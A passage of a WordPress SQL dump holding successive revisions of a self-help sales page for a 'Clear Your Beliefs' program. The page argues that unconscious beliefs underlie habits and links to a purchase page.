(1960, 2, '2014-12-10 23:32:44', '2014-12-11 04:32:44', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-10 23:32:44', '2014-12-11 04:32:44', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1961, 2, '2014-12-10 23:44:07', '2014-12-11 04:44:07', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-10 23:44:07', '2014-12-11 04:44:07', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1962, 2, '2014-12-10 23:54:11', '2014-12-11 04:54:11', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" />', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-10 23:54:11', '2014-12-11 04:54:11', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1963, 2, '2014-12-11 00:03:32', '2014-12-11 05:03:32', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 00:03:32', '2014-12-11 05:03:32', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1964, 2, '2014-12-11 00:06:45', '2014-12-11 05:06:45', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 00:06:45', '2014-12-11 05:06:45', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1965, 2, '2014-12-11 00:17:21', '2014-12-11 05:17:21', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 00:17:21', '2014-12-11 05:17:21', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1966, 2, '2014-12-11 00:20:11', '2014-12-11 05:20:11', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" /></a>', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 00:20:11', '2014-12-11 05:20:11', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1967, 2, '2014-12-11 00:24:10', '2014-12-11 05:24:10', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 00:24:10', '2014-12-11 05:24:10', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1968, 2, '2014-12-11 00:35:05', '2014-12-11 05:35:05', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 00:35:05', '2014-12-11 05:35:05', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1969, 2, '2014-12-11 00:36:18', '2014-12-11 05:36:18', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\r\n&nbsp;\r\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong>\r\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n&nbsp;&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\nYou’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\r\n<h1>\r\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\r\n&nbsp;\r\n<h1>\r\nWhy Does This Happen?</h1>\r\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" />\r\n<p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\r\n<p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p>\r\n<p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 00:36:18', '2014-12-11 05:36:18', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1970, 2, '2014-12-11 00:40:36', '2014-12-11 05:40:36', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 00:40:36', '2014-12-11 05:40:36', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1971, 2, '2014-12-11 00:51:43', '2014-12-11 05:51:43', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 00:51:43', '2014-12-11 05:51:43', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1972, 2, '2014-12-11 01:01:58', '2014-12-11 06:01:58', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n&nbsp;&nbsp;', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 01:01:58', '2014-12-11 06:01:58', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1973, 2, '2014-12-11 01:25:26', '2014-12-11 06:25:26', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our 